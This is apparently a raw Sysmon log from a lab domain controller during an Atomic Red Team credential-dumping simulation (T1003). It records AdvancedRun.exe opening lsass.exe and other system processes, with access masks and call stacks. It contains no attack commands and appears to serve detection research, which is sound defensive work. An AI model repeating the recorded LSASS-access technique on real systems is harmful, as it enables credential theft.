17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943803Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943802Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943801Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943800Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943799Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943798Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943797Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943796Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943795Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943794Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943793Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943792Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943791Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003943790Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003943789Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943788Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943787Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
